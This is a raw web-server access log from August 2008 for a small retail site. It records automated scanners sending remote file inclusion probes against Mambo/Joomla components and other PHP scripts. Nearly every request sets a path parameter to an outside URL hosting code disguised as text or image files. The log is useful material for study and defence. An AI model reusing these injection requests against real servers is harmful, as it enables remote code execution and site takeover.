203.22.204.71 - - [27/Aug/2008:05:01:59 -0700] "GET /logs/access.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
203.22.204.71 - - [27/Aug/2008:05:01:59 -0700] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
203.22.204.71 - - [27/Aug/2008:05:01:59 -0700] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
203.22.204.71 - - [27/Aug/2008:05:02:10 -0700] "GET /logs/access.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
203.22.204.71 - - [27/Aug/2008:05:02:10 -0700] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
203.22.204.71 - - [27/Aug/2008:05:02:10 -0700] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.morningstargifts.com"
74.53.243.226 - - [27/Aug/2008:05:02:36 -0700] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "morningstargifts.com"
74.53.243.226 - - [27/Aug/2008:05:02:36 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "morningstargifts.com"
74.53.243.226 - - [27/Aug/2008:05:02:37 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "morningstargifts.com"
218.38.54.160 - - [27/Aug/2008:05:02:48 -0700] "GET /logs/access.log/?mosConfig_absolute_path=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "morningstargifts.com"
218.38.54.160 - - [27/Aug/2008:05:02:49 -0700] "GET /?mosConfig_absolute_path=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "morningstargifts.com"
218.38.54.160 - - [27/Aug/2008:05:02:50 -0700] "GET /logs/?mosConfig_absolute_path=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 200 4942 "-" "libwww-perl/5.79" "morningstargifts.com"
74.55.115.2 - - [27/Aug/2008:05:02:57 -0700] "GET /logs/access.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
74.55.115.2 - - [27/Aug/2008:05:02:57 -0700] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
74.55.115.2 - - [27/Aug/2008:05:02:57 -0700] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
195.114.29.130 - - [27/Aug/2008:05:04:14 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "morningstargifts.com"
195.114.29.130 - - [27/Aug/2008:05:04:14 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "morningstargifts.com"
196.12.157.26 - - [27/Aug/2008:05:04:14 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://wiminternational.org/n? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
196.12.157.26 - - [27/Aug/2008:05:04:14 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://wiminternational.org/n? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
208.75.225.10 - - [27/Aug/2008:05:04:29 -0700] "GET /logs/access_080710.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://acc-advertising.com/img/idnya.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
74.53.243.226 - - [27/Aug/2008:05:04:50 -0700] "GET /logs/myevent.php?myevent_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.morningstargifts.com"
74.53.243.226 - - [27/Aug/2008:05:04:50 -0700] "GET /myevent.php?myevent_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.morningstargifts.com"
74.55.115.2 - - [27/Aug/2008:05:05:02 -0700] "GET /logs/access.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
74.55.115.2 - - [27/Aug/2008:05:05:02 -0700] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
74.55.115.2 - - [27/Aug/2008:05:05:02 -0700] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
74.6.17.176 - - [27/Aug/2008:05:05:17 -0700] "GET /logs/access.log HTTP/1.0" 200 7301 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.morningstargifts.com"
91.186.30.30 - - [27/Aug/2008:05:05:58 -0700] "GET /logs/?mosConfig_absolute_path=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 200 4942 "-" "libwww-perl/5.808" "www.morningstargifts.com"
91.186.30.30 - - [27/Aug/2008:05:05:59 -0700] "GET /?mosConfig_absolute_path=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "www.morningstargifts.com"
201.17.129.24 - - [27/Aug/2008:05:06:14 -0700] "GET /logs/access_080606.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
201.17.129.24 - - [27/Aug/2008:05:06:17 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
201.17.129.24 - - [27/Aug/2008:05:06:21 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
85.25.3.10 - - [27/Aug/2008:05:06:23 -0700] "GET /logs/access_080714.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:05:06:56 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:05:06:56 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:05:06:56 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "morningstargifts.com"
74.53.243.226 - - [27/Aug/2008:05:06:58 -0700] "GET /logs/access_080606.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.morningstargifts.com"
74.53.243.226 - - [27/Aug/2008:05:06:58 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.morningstargifts.com"
74.53.243.226 - - [27/Aug/2008:05:06:58 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.morningstargifts.com"
74.55.115.2 - - [27/Aug/2008:05:07:01 -0700] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
74.55.115.2 - - [27/Aug/2008:05:07:18 -0700] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://grandmalibby4u.com/galleries/extreme/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.morningstargifts.com"
64.34.172.169 - - [27/Aug/2008:05:07:57 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "morningstargifts.com"
64.34.172.169 - - [27/Aug/2008:05:07:57 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "morningstargifts.com"
64.34.172.169 - - [27/Aug/2008:05:07:57 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "morningstargifts.com"
209.172.55.178 - - [27/Aug/2008:05:08:02 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "morningstargifts.com"
209.172.55.178 - - [27/Aug/2008:05:08:02 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "morningstargifts.com"
209.172.55.178 - - [27/Aug/2008:05:08:02 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "morningstargifts.com"
61.19.249.82 - - [27/Aug/2008:05:08:12 -0700] "GET /logs//galeria.php?start=0&kategoria=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "morningstargifts.com"
61.19.249.82 - - [27/Aug/2008:05:08:12 -0700] "GET //galeria.php?start=0&kategoria=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "morningstargifts.com"
64.34.172.169 - - [27/Aug/2008:05:08:51 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
64.34.172.169 - - [27/Aug/2008:05:08:51 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
64.34.172.169 - - [27/Aug/2008:05:08:51 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
89.253.238.182 - - [27/Aug/2008:05:08:52 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.morningstargifts.com"
89.253.238.182 - - [27/Aug/2008:05:08:52 -0700] "GET /modules/xfsection/modify.php?dir_module=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.morningstargifts.com"
79.189.52.108 - - [27/Aug/2008:05:08:56 -0700] "GET /logs/?mosConfig_absolute_path=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.808" "www.morningstargifts.com"
79.189.52.108 - - [27/Aug/2008:05:08:56 -0700] "GET /?mosConfig_absolute_path=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "www.morningstargifts.com"
201.17.129.24 - - [27/Aug/2008:05:08:58 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "morningstargifts.com"
201.17.129.24 - - [27/Aug/2008:05:09:03 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "morningstargifts.com"
74.53.243.226 - - [27/Aug/2008:05:09:06 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.morningstargifts.com"
74.53.243.226 - - [27/Aug/2008:05:09:06 -0700] "GET /logs/access_080719.log/akocomments.php?mosConfig_absolute_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.morningstargifts.com"
74.53.243.226 - - [27/Aug/2008:05:09:06 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.morningstargifts.com"
201.17.129.24 - - [27/Aug/2008:05:09:07 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "morningstargifts.com"
218.38.54.160 - - [27/Aug/2008:05:09:12 -0700] "GET /?mosConfig_absolute_path=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "morningstargifts.com"
218.38.54.160 - - [27/Aug/2008:05:10:34 -0700] "GET /logs/access_080727.log/?mosConfig_absolute_path=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
218.38.54.160 - - [27/Aug/2008:05:10:35 -0700] "GET /?mosConfig_absolute_path=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.morningstargifts.com"
218.38.54.160 - - [27/Aug/2008:05:10:35 -0700] "GET /logs/?mosConfig_absolute_path=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 200 4942 "-" "libwww-perl/5.79" "www.morningstargifts.com"
79.189.52.108 - - [27/Aug/2008:05:10:36 -0700] "GET /logs/scripts.log//mambots/content/josowbot.content.php?mosConfig_absolute_path=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.morningstargifts.com"
79.189.52.108 - - [27/Aug/2008:05:10:37 -0700] "GET //mambots/content/josowbot.content.php?mosConfig_absolute_path=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.morningstargifts.com"
79.189.52.108 - - [27/Aug/2008:05:10:37 -0700] "GET /logs//mambots/content/josowbot.content.php?mosConfig_absolute_path=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:05:10:51 -0700] "GET /page.php?doc=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:05:10:52 -0700] "GET /logs/page.php?doc=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:05:10:52 -0700] "GET /logs/access_080606.log/page.php?doc=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
79.189.52.108 - - [27/Aug/2008:05:11:56 -0700] "GET /?mosConfig_absolute_path=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "www.morningstargifts.com"
79.189.52.108 - - [27/Aug/2008:05:12:36 -0700] "GET /logs/access.log/?mosConfig_absolute_path=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "morningstargifts.com"
79.189.52.108 - - [27/Aug/2008:05:12:37 -0700] "GET /?mosConfig_absolute_path=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "morningstargifts.com"
79.189.52.108 - - [27/Aug/2008:05:12:37 -0700] "GET /logs/?mosConfig_absolute_path=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.808" "morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:05:12:56 -0700] "GET /logs/access_080606.log/page.php?doc=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:05:12:56 -0700] "GET /page.php?doc=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:05:12:57 -0700] "GET /logs/page.php?doc=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
218.38.54.160 - - [27/Aug/2008:05:14:04 -0700] "GET /?mosConfig_absolute_path=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:05:14:13 -0700] "GET /page.php?doc=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
79.189.52.108 - - [27/Aug/2008:05:14:51 -0700] "GET /logs/?mosConfig_absolute_path=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.808" "www.morningstargifts.com"
79.189.52.108 - - [27/Aug/2008:05:14:52 -0700] "GET /?mosConfig_absolute_path=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "www.morningstargifts.com"
200.68.51.152 - - [27/Aug/2008:05:15:47 -0700] "GET /logs/access_080714.log//atom.php5?page=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
200.68.51.152 - - [27/Aug/2008:05:15:48 -0700] "GET //atom.php5?page=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
200.68.51.152 - - [27/Aug/2008:05:15:48 -0700] "GET /logs//atom.php5?page=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:05:16:25 -0700] "GET /logs/access_080606.log/page.php?doc=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:05:16:26 -0700] "GET /page.php?doc=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:05:16:26 -0700] "GET /logs/page.php?doc=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:05:16:35 -0700] "GET /logs/access_080606.log/page.php?doc=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:05:16:35 -0700] "GET /page.php?doc=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
62.149.232.117 - - [27/Aug/2008:05:16:36 -0700] "GET /logs/page.php?doc=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
201.17.129.24 - - [27/Aug/2008:05:16:53 -0700] "GET /logs/access_080710.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
200.68.51.152 - - [27/Aug/2008:05:16:58 -0700] "GET /logs/access_080710.log//atom.php5?page=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.morningstargifts.com"
201.17.129.24 - - [27/Aug/2008:05:18:08 -0700] "GET /logs/access_080606.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
201.17.129.24 - - [27/Aug/2008:05:18:14 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
201.17.129.24 - - [27/Aug/2008:05:18:20 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
85.159.91.143 - - [27/Aug/2008:05:18:28 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.elettrostudio.ch/fr/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
85.159.91.143 - - [27/Aug/2008:05:18:28 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.elettrostudio.ch/fr/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
85.159.91.143 - - [27/Aug/2008:05:18:33 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.elettrostudio.ch/fr/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
85.159.91.143 - - [27/Aug/2008:05:18:33 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.elettrostudio.ch/fr/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.morningstargifts.com"
79.189.52.108 - - [27/Aug/2008:05:20:25 -0700] "GET /logs/access_080727.log/?mosConfig_absolute_path=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.morningstargifts.com"
79.189.52.108 - - [27/Aug/2008:05:20:26 -0700] "GET /?mosConfig_absolute_path=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "www.morningstargifts.com"
79.189.52.108 - - [27/Aug/2008:05:20:26 -0700] "GET /logs/?mosConfig_absolute_path=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.808" "www.morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:05:20:33 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:05:20:33 -0700] "GET /logs/access_080710.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
212.146.105.237 - - [27/Aug/2008:05:20:33 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://illwolf.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.morningstargifts.com"
201.17.129.24 - - [27/Aug/2008:05:21:42 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
201.17.129.24 - - [27/Aug/2008:05:21:45 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
201.17.129.24 - - [27/Aug/2008:05:21:49 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.morningstargifts.com"
80.93.62.106 - - [27/Aug/2008:05:22:24 -0700] "GET /logs/access.log//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "morningstargifts.com"
80.93.62.106 - - [27/Aug/2008:05:22:25 -0700] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "morningstargifts.com"
80.93.62.106 - - [27/Aug/2008:05:22:26 -0700] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "morningstargifts.com"
